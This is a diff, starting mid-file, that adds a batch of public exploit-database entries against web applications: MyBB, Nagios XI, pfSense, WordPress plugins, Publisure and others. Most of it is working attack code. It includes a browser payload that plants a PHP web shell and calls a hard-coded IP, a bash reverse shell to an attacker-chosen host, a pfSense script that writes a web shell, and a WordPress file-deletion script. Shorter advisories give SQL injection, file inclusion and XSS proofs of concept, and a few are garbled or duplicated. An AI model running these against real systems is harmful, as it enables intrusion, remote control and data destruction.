xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); + xhr.setRequestHeader("Accept-Language","nl,en-US;q=0.7,en;q=0.3"); + xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------21840354016818"); + xhr.setRequestHeader("Upgrade-Insecure-Requests","1"); + }else{ + xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); + } + xhr.send(body); +} + +function getReq(toUrl, property = true){ + var xhr = new XMLHttpRequest(); + + xhr.open("GET",toUrl,false); + xhr.send(); + + prop = property ? xhr.responseText : xhr.status; + return prop; +} + +function upload(url,key,payload){ + url = url + "admin/index.php?module=style-themes&action=import"; + data = "-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"my_post_key\"\r\n\r\n"+key+"\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import\"\r\n\r\n0\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"local_file\"; filename=\"shel1l.xml\"\r\nContent-Type: text/xml\r\n\r\n"+payload+"\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"tid\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"version_compat\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import_stylesheets\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import_templates\"\r\n\r\n1\r\n-----------------------------21840354016818--\r\n"; + postReq(url,data); +} + +function fakeDiv(body){ + var div = document.createElement('div'); + div.innerHTML = body; + div.setAttribute("id","fakediv"); + + document.body.append(div); + var themeLink = document.getElementsByClassName("popup_item")[2].href; + var themeID = themeLink.substring(themeLink.indexOf("tid")+4,themeLink.length); + document.getElementById("fakediv").remove(); + return themeID; +} + +function getThemeID(url){ + url = url + "admin/index.php?module=style-themes"; + responseBody = getReq(url); + return fakeDiv(responseBody); +} + +function editStylesheet(url,key,tid,filename){ + url = url + "admin/index.php?module=style-themes&action=edit_stylesheet&mode=advanced"; + data = "my_post_key="+key+"&tid="+tid+"&file="+filename+"&stylesheet=%3C%3Fphp+system%28%24_GET%5B1%5D%29%3B+%3F%3E&save=Save+Changes"; + + postReq(url,data,false); + +} + +function checkShell(url,theme,filename){ + url = url + "cache/themes/theme" + theme + "/" + filename; + if(getReq(url,false) == 200){ + console.log("[*] Shell found in theme " + theme); + window.open(host + "cache/themes/theme"+theme+"/"+filename+"?1=whoami"); + }else{ + console.log("[!] Exploit failed: Couldn't find shell.") + } +} + +function callHome(theme){ + let IP = "10.11.6.96"; // Change this + let port = 1234; // Change this + + let url = "http://" + IP + ":" + port + "/" + document.domain + "/isPwned/theme" + theme; + + getReq(url); +} + +isAdmin = false; + +host = location.href.split('/')[0] + "//" + location.href.split('/')[2] + "/mybb/"; // Change last part +key = document.getElementsByName("my_post_key")[0].value; +filename = "910910910910910910910910xD.php"; +payload = "\r\n\r\n\r\n\r\ngecko\r\n\r\n\r\n" +upload(host,key,payload); +theme = getThemeID(host); +editStylesheet(host,key,theme,filename); + +isAdmin ? checkShell(host,theme,filename) : callHome(theme); \ No newline at end of file diff --git a/exploits/php/webapps/47299.php b/exploits/php/webapps/47299.php new file mode 100644 index 000000000..b9a5480ac --- /dev/null +++ b/exploits/php/webapps/47299.php @@ -0,0 +1,219 @@ +loadHTML($response); + $xpath = new DOMXpath($DOM); + $input = $xpath->query('//input[@name="nsp"]'); + $nsp = $input->item(0)->getAttribute('value'); + + if (isset($nsp)) { + echo "[+] Extracted NSP - value: {$nsp}\n"; + } else { + echo "[+] Unable to obtain NSP from {$url}\n"; + exit(1); + } + + return $nsp; + +} + +function authenticate($userVal) { + + $postValues = array( + 'username' => $userVal['user'], 'password' => $userVal['pass'], + 'pageopt' => 'login', 'nsp' => $userVal['loginNSP'] + ); + + $curl = curl_init(); + + curl_setopt($curl, CURLOPT_URL, $userVal['loginUrl']); + curl_setopt($curl, CURLOPT_POST, TRUE); + curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($postValues)); + curl_setopt($curl, CURLOPT_REFERER, $userVal['loginUrl']); + curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); + curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt'); + curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt'); + curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); + curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); + + echo "[+] Attempting to login...\n"; + curl_exec($curl); + if (curl_getinfo($curl, CURLINFO_HTTP_CODE) == '302') { + echo "[+] Authentication success\n"; + } else { + echo "[+] Unable to plguin, check your credentials\n"; + exit(1); + } + + echo "[+] Checking we have admin rights...\n"; + curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']); + $response = curl_exec($curl); + + $title = NULL; + + $dom = new DOMDocument(); + if (@$dom->loadHTML($response)) { + $dom->getElementsByTagName("title")->length > 0 ? $title = $dom->getElementsByTagName("title")->item(0)->textContent : FALSE; + } + + if (strpos($title, 'Manage') !== FALSE) { + echo "[+] Admin access confirmed\n"; + } else { + echo "[+] Unable to reach login page, are you admin?\n"; + exit(1); + } + +} + +function uploadPayload($userVal) { + + $payload = "-----------------------------18467633426500\nContent-Disposition: form-data; name=\"upload\"\n\n1\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"nsp\"\n\n{$userVal['pluginNSP']}\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\nContent-Type: text/plain\n\nbash -i >& /dev/tcp/{$userVal['reverseip']}/{$userVal['reverseport']} 0>&1\n-----------------------------18467633426500--\n"; + + $curl = curl_init(); + curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']); + curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($curl, CURLOPT_POSTFIELDS, $payload); + curl_setopt($curl, CURLOPT_POST, 1); + curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate'); + curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); + curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); + curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt'); + + $headers = array(); + $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; + $headers[] = 'Accept-Language: en-GB,en;q=0.5'; + $headers[] = 'Referer: ' . $userVal['pluginUrl']; + $headers[] = 'Content-Type: multipart/form-data; boundary=---------------------------18467633426500'; + $headers[] = 'Connection: keep-alive'; + $headers[] = 'Upgrade-Insecure-Requests: 1'; + + curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); + + echo "[+] Uploading payload...\n"; + + $response = curl_exec($curl); + $dom = new DOMDocument(); + @$dom->loadHTML($response); + + $upload = FALSE; + + foreach ($dom->getElementsByTagName('div') as $div) { + + if ($div->getAttribute('class') === 'message') { + if (strpos($div->nodeValue, 'New plugin was installed') !== FALSE) { + $upload = TRUE; + } + } + } + + if ($upload) { + echo "[+] Payload uploaded\n"; + } else { + echo '[+] Unable to upload payload'; + exit(1); + } + +} + +function triggerPayload($userVal) { + + $curl = curl_init(); + curl_setopt($curl, CURLOPT_URL, $userVal['profileGenUrl']); + curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate'); + curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt'); + + $headers = array(); + $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; + $headers[] = 'Connection: keep-alive'; + $headers[] = 'Upgrade-Insecure-Requests: 1'; + + curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); + + echo "[+] Triggering payload: if successful, a reverse shell will spawn at {$userVal['reverseip']}:{$userVal['reverseport']}\n"; + + curl_exec($curl); + +} + +function showHelp() { + echo "Usage: php exploit.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port\n"; + exit(0); +} + +function parseArgs($argv) { + + $userVal = array(); + for ($i = 1; $i < count($argv); $i++) { + if (preg_match('/^--([^=]+)=(.*)/', $argv[$i], $match)) { + $userVal[$match[1]] = $match[2]; + } + } + + if (!isset($userVal['host']) || !isset($userVal['ssl']) || !isset($userVal['user']) || !isset($userVal['pass']) || !isset($userVal['reverseip']) || !isset($userVal['reverseport'])) { + showHelp(); + } + + $userVal['ssl'] == 'true' ? $userVal['proto'] = 'https://' : $userVal['proto'] = 'http://'; + $userVal['loginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/login.php'; + $userVal['pluginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/admin/monitoringplugins.php'; + $userVal['profileGenUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/includes/components/profile/profile.php?cmd=download'; + + return $userVal; + +} + +function checkCookie() { + if (file_exists('cookie.txt')) { + echo "cookie.txt already exists - delete prior to running"; + exit(1); + } +} \ No newline at end of file diff --git a/exploits/php/webapps/47359.txt b/exploits/php/webapps/47359.txt new file mode 100644 index 000000000..fff273015 --- /dev/null +++ b/exploits/php/webapps/47359.txt @@ -0,0 +1,97 @@ +##################################################################################### +# Exploit Title: [PUBLISURE : From 0 to local Administrator (3 vulns) exploit-chain] +# Google Dork: [N/A] +# Date: [05/09/2019] +# Exploit Author: [Bourbon Jean-Marie (@kmkz_security) - Hacknowledge company] +# Vendor Homepage: [https://www.publisure.com/] +# Software Link: [N/C] +# Version: [version 2.1.2] +# Tested on: [Windows 7 Enterprise] +# CVE : [CVE-2019-14252, CVE-2019-14253, CVE-2019-14254] + +##################################################################################### +# Improper Access Control +# +# CVSSv3: 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) +# OVE ID: OVE-20190724-0002 +# CVE ID: CVE-2019-14253 +# +##################################################################################### +# (Pre-Authenticated) Multiples SQL injection +# +# CVSSv3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N) +# OVE ID: OVE-20190724-0003 +# CVE ID: CVE-2019-14254 +# +##################################################################################### +# Unrestricted File Upload RCE +# +# CVSSv3: 9.1(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) +# OVE ID: OVE-20190724-0004 +# CVE ID: CVE-2019-14252 +# +##################################################################################### +# Fixes: +# Upgrade to latest product version and/or contact support for patches +##################################################################################### + +I. PRODUCT + +Publisure Hybrid mail is a highly efficient and cost effective alternative to traditional methods of producing and posting correspondence within an organization. +The Publisure system can either be used for centralized, internal production within your existing facilities or alternatively, it can be implemented as a fully outsourced solution. + +Note that this advisory is based on a version 2.1.2 which is a legacy version since a newer one was released. + +II. ADVISORY + +A combination of three different vulnerabilities permits an unauthenticated attacker to gain Administrator access on the server hosting Publisure application. + +III. VULNERABILITIES DESCRIPTIONS + +a) The first issue permits to bypass authentication mechanism allowing malicious person to perform query on PHP forms within the /AdminDir folder that should be restricted. +b) The second weakness is that SQL queries are not well sanitized resulting in multiple SQL injection in "userAccFunctions.php" functions. +Using this two steps, an attacker can access passwords and/or grant access to user account "user" in order to become "Administrator" (for example). + +c) Once successfully authenticated as an administrator, he is able to inject PHP backdoor by using "adminCons.php" form. + This backdoor will then be stored in E:\PUBLISURE\webservice\webpages\AdminDir\Templates\ folder even if removed from "adminCons.php" view (permitting to hide the malicious PHP file). + +IV. PROOF OF CONCEPT + +a) Access to AdminDir PHP scripts and database querying is possible whithout authentication (ex: http://192.168.13.37/AdminDir/editUser.php?id=2) +b) Vulnerable URL example: http://192.168.13.37/AdminDir/editUser.php?id=sqli +"editUser.php" vulnerable code: $user = getUserDtails($_GET['id']); + +"userAccFunctions.php" vulnerable code example: + +function getUserDtails($id) { + global $db; + //The reseller_accounts table has been used to store department information since PDQit + $Q = "SELECT a.username as username,a.contact_firstname,a.contact_lastname,a.email,r.company_name, a.enabled, a.record_id, a.password, a.unique_identifier, a.reseller_id, a.approval, a.resourceEditType, a.docView FROM accounts a, reseller_accounts r WHERE r.record_id = a.reseller_id AND a.record_id = $id"; + $R = $db->query($Q); + return $R; +} + +c) "adminCons.php" form permits to upload leading to RCE and allow attacker to hide malicious PHP code stored within "/AdminDir/Templates" folder (ex: http://192.168.13.37/AdminDir/Templates/tata.php?c=whoami) + + +V. RECOMMENDATIONS + +a) Restrict access to administrative (and other) folder when non authenticated. +b) Prepare SQL query before execution using PDO to escape injections. +c) Check file type on file upload forms to prevent PHP code upload instead of templates. + + +VI. TIMELINE + +July 23th, 2019: Vulnerability identification +July 30th, 2019: First contact with the editor (Publisure) and vulnerabilities acknowledgement +August 13th, 2019: Contact to vendor to ask for fix - no reply +September 04th, 2019: Vendor was informed 24h before public disclosure +September 05th, 2019: public disclosure after 45 days + +VIII. LEGAL NOTICES + +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of this advisory. + +The applied disclosure policy is based on US CERT Responsible Disclosure Policy - https://www.us-cert.gov/vulnerability-disclosure-policy \ No newline at end of file diff --git a/exploits/php/webapps/47413.py b/exploits/php/webapps/47413.py new file mode 100755 index 000000000..355481786 --- /dev/null +++ b/exploits/php/webapps/47413.py @@ -0,0 +1,167 @@ +# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection +# Date: 23/09/2018 +# Author: Nassim Asrir +# Vendor Homepage: https://www.pfsense.org/ +# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/ +# CVE: CVE-2019-16701 +# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3 +###################################################################################################### + +1 : About Pfsense: +================== + +pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more. + +2 : Technical Analysis: +======================= + +The pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands. + +XMLRPC methods: + +pfsense.exec_shell +pfsense.exec_php +pfsense.filter_configure +pfsense.interfaces_carp_configure +pfsense.backup_config_section +pfsense.restore_config_section +pfsense.merge_config_section +pfsense.merge_installedpackages_section_xmlrpc +pfsense.host_firmware_version +pfsense.reboot +pfsense.get_notices +system.listMethods +system.methodHelp +system.methodSignature + +As we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php. + +2 : Static Analysis: +==================== + +In the static analysis we will analysis the xmlrpc.php file. + +Line (73 - 82) + +This code check if the user have enough privileges. + +$user_entry = getUserEntry($username); + /* + * admin (uid = 0) is allowed + * or regular user with necessary privilege + */ + if (isset($user_entry['uid']) && $user_entry['uid'] != '0' && + !userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) { + log_auth("webConfigurator authentication error for '" . + $username . "' from " . $this->remote_addr . + " not enough privileges"); + + +Line (137 - 146) + +This part of code is the interest for us. + +As we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code). + + public function exec_php($code) { + $this->auth(); + + eval($code); + if ($toreturn) { + return $toreturn; + } + + return true; + } + +Line (155 - 160) + +In this part of code also we have a check for auth then the execution for ($code) + + public function exec_shell($code) { + $this->auth(); + + mwexec($code); + return true; + } + +3 - Exploit: +============ + +#!/usr/bin/env python + +import argparse +import requests +import urllib2 +import time +import sys +import string +import random + +parser = argparse.ArgumentParser() +parser.add_argument("--rhost", help = "Target Uri https://127.0.0.1") +parser.add_argument("--password", help = "pfsense Password") +args = parser.parse_args() + +rhost = args.rhost +password = args.password +print "" + +print "[+] CVE-2019-16701 - Pfsense - Remote Code Injection" +print "" +print "[+] Author: Nassim Asrir" +print "" + +command = "" +command += "" +command += "pfsense.host_firmware_version" +command += "" +command += ""+password+"" +command += "" +command += "" + +stage1 = rhost + "/xmlrpc.php" + +page = urllib2.urlopen(stage1, data=command).read() + +print "[+] Checking Login Creds" + + +if "Authentication failed" in page: + + print "[-] Wrong password :(" + sys.exit(0) +else: + + random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)]) + + print "[+] logged in successfully :)" + print "[+] Generating random file "+random+".php" + print "[+] Sending the exploit ....." + + + command = "" + command += "" + command += "pfsense.exec_php" + command += "" + command += ""+password+"" + command += "exec('echo \\'
\\' > /usr/local/www/"+random+".php');" + command += "" + command += "" + +stage1 = rhost + "/xmlrpc.php" + +page = urllib2.urlopen(stage1, data=command).read() + +final = rhost+"/"+str(random)+".php" + +check = urllib2.urlopen(final) + +print "[+] Checking ....." + +if check.getcode() == 200: + + print "[+] Yeah! You got your shell: " + final+"?cmd=id" +else: + + print "[+] Sorry :( Shell not found check the path" \ No newline at end of file diff --git a/exploits/php/webapps/47443.rb b/exploits/php/webapps/47443.rb new file mode 100755 index 000000000..7cb5b5222 --- /dev/null +++ b/exploits/php/webapps/47443.rb @@ -0,0 +1,238 @@ +#!/usr/bin/env ruby + +# Exploit Title: WordPress Arforms - 3.7.1 +# CVE ID: CVE-2019-16902 +# Date: 2019-09-27 +# Exploit Author: Ahmad Almorabea +# Author Website: http://almorabea.net +# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt +# Software Link: https://www.arformsplugin.com/documentation/changelog/ +# Version: 3.7.1 + +#**************Start Notes************** +# You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders. +# Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet. +# Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143. +# But maybe in other forms maybe it's different so you have to change it accordingly. +# This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on +# There is a request file with this Script make sure to put it in the same folder. +#**************End Notes**************** + +require "net/http" +require 'colorize' + +$host = ARGV[0] || "" +$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad" + + + +def start_function () + + puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow + name = STDIN.gets + + if $host == "" + puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red + exit + end + + + check_existence_arform_folder + execute_deletion_attack + + puts "Done ... see ya " + name + +end + + +def send_checks(files_names) + + + + + j = 1 + while j <= files_names.length-1 + + uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j]) + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS + + request = Net::HTTP::Get.new(uri.request_uri) + request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0" + request["Connection"] = "keep-alive" + request["Accept-Language"] = "en-US,en;q=0.5" + request["Accept-Encoding"] = "gzip, deflate" + request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + + + begin + + response = http.request(request).code + puts "The File " + files_names[j] + " has the response code of " + response + rescue Exception => e + puts "[!] Failed!" + puts e + end + j = j+1 + end +end + + +def check_existence_arform_folder () + + + + path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"] + $i = 0 + results = [] + + while $i <= path_array.length-1 + + uri = URI.parse("http://#{$host}/#{path_array[$i]}") + #puts uri + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS + request = Net::HTTP::Get.new(uri.request_uri) + response = http.request(request) + results[$i] = response.code + #puts"response code is : " + response.code + + $i +=1 + + end + + puts "****************************************************" + + if results[0] == "200" || results[0] =="301" + + puts "The Plugin is Available on the following path : ".green + $host + path_array[0] + else + puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red + exit + end + + if (results[1] == "200" || results[1] == "301") + + puts "The User Files folder is Available on the following path : ".green + $host + path_array[1] + else + + puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1] + + end + puts "****************************************************" + + + +end + + +def execute_deletion_attack () + + + + puts "How many file you want to delete my man" + amount = STDIN.gets.chomp.to_i + + if(amount == 0) + puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue + exit + end + + file_names = [] + file_names[0] = "143_772_1569713145702_temp3.txt" + j = 1 + while j <= amount.to_i + puts "Name of the file number " + j.to_s + file_names[j] = STDIN.gets + file_names[j].strip! + j = j+1 + end + + + uri = URI.parse("http://#{$host}") + #puts uri + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = true if uri.scheme == 'https' + request = Net::HTTP::Get.new(uri.request_uri) + response = http.request(request) + global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie + + + + + $i = 0 + while $i <= file_names.length-1 + + puts "Starting the Attack Journey .. ".green + + uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") + headers = + { + 'Referer' => 'From The Sky', + 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', + 'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615', + 'Accept-Encoding' => 'gzip, deflate', + 'Cookie' => global_cookie, + 'X_FILENAME' => file_names[$i], + 'X-FILENAME' => file_names[$i], + 'Connection' => 'close' + + } + + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = true if uri.scheme == 'https' + request = Net::HTTP::Post.new(uri.path, headers) + request.body = File.read("post_file") + response = http.request request + + $i = $i +1 + end + + execute_delete_request file_names,global_cookie,amount.to_i + + puts "Finished.........." + +end + +def execute_delete_request (file_names,cookies,rounds ) + + + $i = 0 + + while $i <= file_names.length-1 + + puts "Starting the Attack on file No #{$i.to_s} ".green + + uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") + headers = + { + 'Referer' => 'From The Sky', + 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', + 'Accept' => '*/*', + 'Accept-Language' => 'en-US,en;q=0.5', + 'X-Requested-With'=> 'XMLHttpRequest', + 'Cookie' => cookies, + 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'close' + } + + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = true if uri.scheme == 'https' + request = Net::HTTP::Post.new(uri.path,headers) + request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143" + response = http.request(request) + + if $i != 0 + puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code + end + $i = $i +1 + + end + + send_checks file_names + +end + + +start_function() \ No newline at end of file diff --git a/exploits/php/webapps/48023.txt b/exploits/php/webapps/48023.txt new file mode 100644 index 000000000..996732f50 --- /dev/null +++ b/exploits/php/webapps/48023.txt @@ -0,0 +1,28 @@ +# Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection +# Data: 2020-02-06 +# Exploit Author: Mehran Feizi +# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop +# Tested on: Windows +# Google Dork: N/A + + +========= +Vulnerable Page: +========= +/viewtestdrive.php + + +========== +Vulnerable Source: +========== +Line6: if(isset($_GET['testid'])) +Line8: $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'"); +Line11: if(isset($_GET['testbid'])) +Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'"); +Line16: if(isset($_GET['testbida'])) +Line:18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'"); + +========= +POC: +========= +http://site.com/viewtestdrive.php?bookingid=[SQL] \ No newline at end of file diff --git a/exploits/php/webapps/48058.txt b/exploits/php/webapps/48058.txt new file mode 100644 index 000000000..81f08de2d --- /dev/null +++ b/exploits/php/webapps/48058.txt @@ -0,0 +1,39 @@ +# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion +# Author: mehran feizi +# Category: webapps +# Date: 2020-02-12 +# vendor home page: https://wordpress.org/plugins/tutor/ + +=================================================================== +Vulnerable page: +/instructors.php +=================================================================== +Vulnerable Source: +3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); +5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; +7: include include $include_file; +requires: +4: if(!empty($sub_page)) +6: if(file_exists($include_file)) +=================================================================== +Exploit: +localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] +================================================================================= +contact me: +telegram: @MF0584 +gmail: mehranfeizi13841384@gmail.com +=================================================================== +Vulnerable page: +/instructors.php +=================================================================== +Vulnerable Source: +3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); +5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; +7: include include $include_file; +requires: +4: if(!empty($sub_page)) +6: if(file_exists($include_file)) +=================================================================== +Exploit: +localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] +================================================================================= \ No newline at end of file diff --git a/exploits/php/webapps/48059.txt b/exploits/php/webapps/48059.txt new file mode 100644 index 000000000..25198467a --- /dev/null +++ b/exploits/php/webapps/48059.txt @@ -0,0 +1,18 @@ +# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting +# Author: mehran feizi +# Category: webapps +# Date: 2020-02-12 +# vendor home page: https://wordpress.org/plugins/tutor/ + +=================================================================== +Vulnerable page: +/Quiz.php +=================================================================== +Vulnerable Source: +473: echo echo $topic_id; +447: $topic_id = sanitize_text_field($_POST['topic_id']); +=================================================================== +Exploit: +localhost/wp-content/plugins/tutor/classes/Quiz.php +$_POST('topic_id') = +================================================================================= \ No newline at end of file diff --git a/exploits/php/webapps/48061.txt b/exploits/php/webapps/48061.txt new file mode 100644 index 000000000..257c72a7f --- /dev/null +++ b/exploits/php/webapps/48061.txt @@ -0,0 +1,14 @@ +# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure +# Author: mehran feizi +# Category: webapps +# Date: 2020-02-12 +# vendor home page: https://wordpress.org/plugins/wordfence/ + +============================================================================== +Vulnerable Source: +5662: readfile readfile($localFile); +5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file'])); +================================================================================= +Exploit: +localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD] +================================================================================= \ No newline at end of file diff --git a/exploits/php/webapps/48062.txt b/exploits/php/webapps/48062.txt new file mode 100644 index 000000000..a14067976 --- /dev/null +++ b/exploits/php/webapps/48062.txt @@ -0,0 +1,39 @@ +# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload +# Author: mehran feizi +# Category: webapps +# Date: 2020-02-11 +# vendor home page: https://wordpress.org/plugins/contact-form-7/ + +Vulnerable Source: +134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file)) +82: $file = $_FILES[$name] : null; +132: $new_file = path_join($uploads_dir, $filename); +122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); +121: $uploads_dir = wpcf7_upload_tmp_dir(); +131: $filename = wp_unique_filename($uploads_dir, $filename); +122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); +121: $uploads_dir = wpcf7_upload_tmp_dir(); +128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); +126: $filename = wpcf7_antiscript_file_name ($filename); +125: $filename = wpcf7_canonicalize ($filename, 'as-is'); +124: $filename = $file['name']; +82: $file = $_FILES[$name] : null; +82: $file = $_FILES[$name] : null; +78: ⇓ function wpcf7_file_validation_filter($result, $tag) + + +Exploit: +"@$shahab")); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$result = curl_exec($ch); +curl_close($ch); +print "$result"; +?> + +Location File: +http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg \ No newline at end of file diff --git a/exploits/php/webapps/48065.txt b/exploits/php/webapps/48065.txt new file mode 100644 index 000000000..b16e2319f --- /dev/null +++ b/exploits/php/webapps/48065.txt @@ -0,0 +1,19 @@ +# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion +# Author : mehran feizi +# Vendor : https://wordpress.org/plugins/ultimate-member/ +# Category : Webapps +# Date : 2020-02-11 +# Vendor home page: https://wordpress.org/plugins/ultimate-member/ + +Vulnerable Page: +/class-admin-upgrade.php + + +Vulnerable Source: +354: if(empty($_POST['pack'])) else +356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php'; + + +Exploit: +localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php +$_POST('pack')= \ No newline at end of file diff --git a/exploits/php/webapps/48088.txt b/exploits/php/webapps/48088.txt new file mode 100644 index 000000000..ac29788ea --- /dev/null +++ b/exploits/php/webapps/48088.txt @@ -0,0 +1,29 @@ +# Exploit Title: Wordpress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting +# Date: 2020-02-15 +# Exploit Author: Shahab.ra.9 +# Vendor Homepage: https://products-filter.com/ +# Software Link: https://wordpress.org/plugins/woocommerce-products-filter/ +# Version: 1.2.3 +# Tested on: windows 10 +# WOOF - Products Filter for WooCommerce + +Exploit: +http://target/wp-admin/admin.php?page=wc-settings&tab=woof + +now in tab "design" -> then enter (xss code) in the (textfields) front side +->(Text for block toggle ,Text for block toggle , Custom front css styles +file link). +then click on button "save changes". +then refresh page 